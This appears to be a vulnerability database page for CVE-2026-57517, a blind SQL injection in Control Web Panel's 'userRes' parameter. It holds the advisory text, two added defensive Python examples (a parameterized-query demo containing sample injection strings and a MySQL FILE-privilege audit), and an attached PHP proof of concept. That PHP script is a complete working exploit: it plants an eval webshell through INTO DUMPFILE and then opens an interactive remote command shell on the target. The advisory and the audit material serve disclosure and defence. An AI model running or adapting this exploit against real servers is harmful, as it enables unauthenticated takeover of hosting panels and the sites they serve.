| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-57517 | 1 Jul 2026 15:11 | – | attackerkb |
| CVE-2026-57517 | 1 Jul 2026 16:45 | – | circl |
| CVE-2026-57517 | 1 Jul 2026 15:11 | – | cve |
| CVE-2026-57517 Control Web Panel < 0.9.8.1225 Blind SQL Injection via userRes Parameter | 1 Jul 2026 15:11 | – | cvelist |
| EUVD-2026-41027 | 1 Jul 2026 15:11 | – | euvd |
| CVE-2026-57517 | 1 Jul 2026 16:16 | – | nvd |
| CVE-2026-57517 Control Web Panel < 0.9.8.1225 Blind SQL Injection via userRes Parameter | 1 Jul 2026 15:11 | – | vulnrichment |
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
[-] Software Link:
https://control-webpanel.com
[-] Affected Versions:
Version 0.9.8.1224 and prior versions.
[-] Vulnerability Description:
User input passed through the "userRes" POST parameter to
https://[CWP_Host]:2083/[CWP_Username]/
is not properly sanitized before being used to construct an SQL query. This
can be exploited by remote, unauthenticated attackers to carry out (blind)
SQL Injection attacks.
Successful exploitation of this vulnerability requires the attacker to know
or correctly guess the username of a valid non-root account on the affected
CWP instance.
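The defect described above, a request value spliced into SQL text, shown beside the parameterized form that removes it. This is an added example, not code from the advisory or from CWP: it uses an in-memory SQLite database with constructed rows, and the table names (`accounts`, `secrets`), column names, row values and `lookup_*` function names are assumptions for illustration, not the panel's real schema. It demonstrates both shapes of input the description covers: a UNION that appends rows from another table, and a boolean condition whose only visible effect is whether the original row comes back, which is what makes the injection exploitable blind.

```python
import sqlite3

# Constructed toy schema standing in for the panel's database; none of these
# table or column names come from CWP (assumption for illustration only).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER, username TEXT, email TEXT)")
    con.execute("CREATE TABLE secrets (id INTEGER, token TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                    [(1, "bob", "bob@example.test"), (2, "alice", "alice@example.test")])
    con.execute("INSERT INTO secrets VALUES (1, 'CONSTRUCTED-SECRET')")
    return con

def lookup_vulnerable(con, user_res):
    """Mirrors the advisory's defect: the request value becomes part of the SQL text."""
    sql = f"SELECT id, username, email FROM accounts WHERE username = '{user_res}'"
    return con.execute(sql).fetchall()

def lookup_fixed(con, user_res):
    """Hardened form: the value travels as a bound parameter, never as SQL syntax."""
    sql = "SELECT id, username, email FROM accounts WHERE username = ?"
    return con.execute(sql, (user_res,)).fetchall()

# Constructed inputs. The first appends attacker-chosen rows through UNION; the
# other two differ only in a condition that is always true or always false, so
# the only signal is whether bob's row is returned (the "blind" case).
UNION_INPUT = "' UNION SELECT 1, token, 3 FROM secrets --"
BLIND_TRUE = "bob' AND 1=1 --"
BLIND_FALSE = "bob' AND 1=2 --"

def blind_oracle_differs(lookup, con):
    """True when the result changes between the tautology and the contradiction,
    i.e. when a remote party could infer query truth from the response."""
    return lookup(con, BLIND_TRUE) != lookup(con, BLIND_FALSE)

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, UNION :", lookup_vulnerable(con, UNION_INPUT))
    print("fixed, UNION      :", lookup_fixed(con, UNION_INPUT))
    print("vulnerable, blind :", blind_oracle_differs(lookup_vulnerable, con))
    print("fixed, blind      :", blind_oracle_differs(lookup_fixed, con))
```

With the vulnerable lookup the UNION input returns the `secrets` row and the two boolean inputs return different results; with the parameterized lookup both inputs are just usernames that match nothing, so neither the row leak nor the true/false oracle exists. The MySQL file-writing step the NOTE below describes is deliberately not reproduced here.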
NOTE: successful exploitation allows an unauthenticated attacker to execute
arbitrary SQL queries with the privileges of the MySQL root user. Because
this account possesses the global FILE privilege, the vulnerability can be
leveraged to write arbitrary files to writable locations on the underlying
filesystem using MySQL's file output capabilities (e.g., INTO DUMPFILE). By
writing a malicious PHP payload to the web-accessible
/usr/local/cwpsrv/var/services/roundcube/logs/ directory, an attacker might
be able to execute arbitrary PHP code remotely, resulting in full Remote
Code Execution (RCE) on the affected CWP instance with the privileges of
the 'cwpsvc' account.
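The NOTE above depends on two server-side conditions a defender can audit independently of the patch: the application's database account holding the global FILE privilege, and the MySQL server allowing `INTO DUMPFILE` to write outside a confined directory. The following is an added example, not part of the advisory or of CWP, that parses lines in the shape of `SHOW GRANTS` output to list FILE-capable accounts and classifies the `secure_file_priv` setting as MySQL documents it (NULL disables server-side file import/export, an empty string leaves it unrestricted, a path confines it to that directory). The grant lines and the account names `cwp_app` and `reporting` are constructed samples, not the panel's real accounts.

```python
import re

# Constructed sample lines in the shape of `SHOW GRANTS` output; the account
# names and scopes are assumptions for this example, not CWP's real accounts.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `cwp_db`.* TO `cwp_app`@`localhost`",
    "GRANT SELECT, FILE ON *.* TO `reporting`@`%`",
    "GRANT USAGE ON *.* TO `reporting`@`%`",
]

# Privileges that let a session write server-side files with SELECT ... INTO
# DUMPFILE / OUTFILE. FILE is a global privilege, so it only ever appears with
# scope *.*, and ALL PRIVILEGES ON *.* includes it.
FILE_CAPABLE = {"FILE", "ALL PRIVILEGES"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>\S+)",
    re.IGNORECASE,
)

def parse_grant(line):
    """Return {'user', 'scope', 'privs'} for one GRANT line, or None if it does not parse."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return {"user": m.group("user"), "scope": m.group("scope"), "privs": privs}

def file_capable_accounts(grant_lines):
    """Accounts whose grants would let an injection turn into a file write, first-seen order."""
    found = []
    for line in grant_lines:
        g = parse_grant(line)
        if g and g["scope"] == "*.*" and g["privs"] & FILE_CAPABLE and g["user"] not in found:
            found.append(g["user"])
    return found

def secure_file_priv_status(value):
    """Classify the value of @@secure_file_priv: None (SQL NULL) disables file
    import/export, '' leaves it unrestricted, a path confines it to that directory."""
    if value is None:
        return "disabled"
    if value == "":
        return "unrestricted"
    return f"restricted to {value}"

if __name__ == "__main__":
    print("FILE-capable accounts:", file_capable_accounts(SAMPLE_GRANTS))
    for v in (None, "", "/var/lib/mysql-files/"):
        print(f"secure_file_priv={v!r}:", secure_file_priv_status(v))
```

In the constructed sample only `root` and `reporting` are flagged; `cwp_app`, which holds ordinary DML on one schema, is not. A web application's database account should look like `cwp_app` rather than `root`: even with the query parameterized after the upgrade, an account without FILE and a server with `secure_file_priv` set cannot be used to drop a file into a web-served directory.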
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-57517.php
[-] Solution:
Upgrade to version 0.9.8.1225 or later.
[-] Disclosure Timeline:
[XX/YY/2025] - Vulnerability discovered
[06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
[26/06/2026] - CVE identifier requested
[26/06/2026] - CVE identifier assigned
[01/07/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-57517 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
--- packet storm attached poc ---
<?php
/*
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://control-webpanel.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "+-----------------------------------------------------------------------+\n";
print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 3)
{
    print "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
    print "\nExample....: php $argv[0] 127.0.0.1 egix";
    print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
    die();
}
function hex_enc($input)
{
    $encoded = "";
    for ($i = 0; $i < strlen($input); $i++)
        $encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$sh_fname = uniqid() . ".php";
$phpshell = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
$injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
curl_exec($ch);
print "[+] Executing PHP webshell\n";
$phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
curl_setopt($ch, CURLOPT_POST, false);
while(1)
{
    print "\ncwp-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}